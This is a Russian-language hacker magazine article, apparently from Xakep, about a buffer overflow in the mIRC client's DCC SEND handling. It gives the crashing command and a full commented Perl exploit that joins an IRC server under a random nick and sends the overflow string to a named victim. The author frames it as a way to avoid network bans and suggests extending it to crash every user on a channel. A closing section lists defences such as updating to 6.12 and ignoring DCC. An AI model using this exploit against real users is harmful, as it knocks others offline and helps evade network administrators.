Совсем недавно мир был повержен новой багой в популярном IRC-клиенте. Если ты еще не знаешь о ней, читай
http://www.irchelp.org/irchelp/mirc/exploit.html. Суть в том, что благодаря элементарному переполнению буфера, становится возможным завалить удаленный клиент.

1. Теория.

Для того, чтобы убить mIRC, необходимо выполнить команду /privmsg NICK (1)DCC SEND "x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x" 0.

Где NICK - ник жертвы, а (1) - специальный символ (эквивалентен значению первого элемента таблицы ASCII), который применяется в клиенте. Обычно хакер может сам набрать подобную строку и завалить жертву, но это небезопасно по следующей причине:

Администрации IRC-сетей (особенно русских) далеко не наплевать на своих клиентов. Поэтому за подобные штуки хакеры награждаются глобальным баном (Gline) в сеть. Остается лишь пользоваться небольшим эксплойтом с буржуйского шелла, задача которого просто приконнектиться к серваку и послать команду.

2. Практика.

Такого эксплойта я не нашел, поэтому написал свой. В этом нет ничего сложного,
по сути скрипт - обычный IRC-бот (правда, весьма упрощенный). В скрипте я удалил ряд строк и добавил лишь отправку команды. Первоисточником являлся мой IRC-whoiser, про который я писал месяца два назад (в эпоху актуальности RPC-DCOM уязвимости).

Итак, сам эксплойт. Снабжаю его листинг подробными комментариями, чтобы лишний раз научить тебя программить на Perl :).

#!/usr/bin/perl

use IO::Socket;
use Getopt::Std;
getopt("spn"); ##
Подключаем сокеты, getopt и парсим командную строку на параметры сервера, порта и ника.

$server=$opt_s || "mesra.kl.my.dal.net";
$port=$opt_p || 6667;
$nick=$opt_n || "Lamer"; ##
Создаем дефолтовые поля.
$rand=int(rand(65550)); ##
Генерируем случайное число.
print "Making connection to $server:$port... ";
$irc=IO::Socket::INET->new("$server:$port") || die print "failed!\n";
$irc->autoflush(1);
$|++; ##
Создаем сокет, вырубаем буферизацию и соединяемся с сервером.
$mynick="SweetBoy".$rand; ##
Генерируем ник по принципу SweetBoy+случайное 5-значное число.
print "done\nRegistering on server... ";
$irc->send("USER $mynick $mynick $mynick :$mynick\nNICK $mynick\n"); ##
Регистрируемся на сервере.
sleep 20; ##
Ждем 20 секунд (проще, чем юзать IO::Select, либо цикл с
$irc->recv()).

$spec=chr(1); ##
Формируем шеллкод 🙂
$spec.="DCC SEND \"x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x\" 0"; 
##
Состоящий из спец-символа, а также роковой команды.
$irc->send("PRIVMSG $nick :$spec\n"); ##
Посылаем команду для ника.
sleep 10; ##
Спим еще 10 секунд (для надежности).
print "done\nExiting...\n";
$irc->send("QUIT :bb2all\n"); ##
Выходим из сети
close($irc); ##
И закрываем сокет.

Я пошел легким, но неверным путем, используя sleep в своем скрипте. Конечно, надежности это не придает ни на грамм, зато... работает :). Я думаю, что 30 секунд ты подождешь без проблем.

Кстати, при желании ты можешь промодифицировать мой whios.pl в оружие массового поражения, которое рассылает подобное мессагу каждому нику на канале. Пусть это действие останется на твоей совести.

3. Защита.

И логическим завершение статьи будет ряд защитных действий против данного эксплойта и вообще баги.

Во-первых, переустанови mIRC на более свежий 6.12 релиз. Он был выпущен на следующий день после новости о баге. С новым клиентом у тебя не будет никаких проблем (если конечно багоискатели не найдут новую брешь в клиенте).

Во-вторых, выполни команду /ignore -wd * если возможности переустановить клиент не существует. Такой
игнор блокирует все входящие DCC-запросы. Таким образом, команда твоим клиентом обработана не будет.

В-третьих, существует скрипт для клиента, который фиксит переполнение буфера. Его ты можешь скачать по адресу
http://www.erler.org/Olathe/exploit%20fix.mrc. Вариант для продвинутых :).

И, наконец, некоторые IRC-сети пошли навстречу своим инертным юзерам. Например, в IRCNetRu блокирован DCC на уровне сети, поэтому побаловаться эксплойтом на серверах русского Иркнета невозможно. Как говорится, и волки сыты и
овцы целы (и пастуху вечная память :)).

4. Злоключение.

Вот, собственно, и все. Данная статья отражает еще один скрытый смысл - написать собственный эксплойт очень просто, если, конечно, знаешь принцип баги. Для меня модификация скрипта заняла около двух минут, и все заработало с первого раза, поэтому ничего сложного в скриптизации нет.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии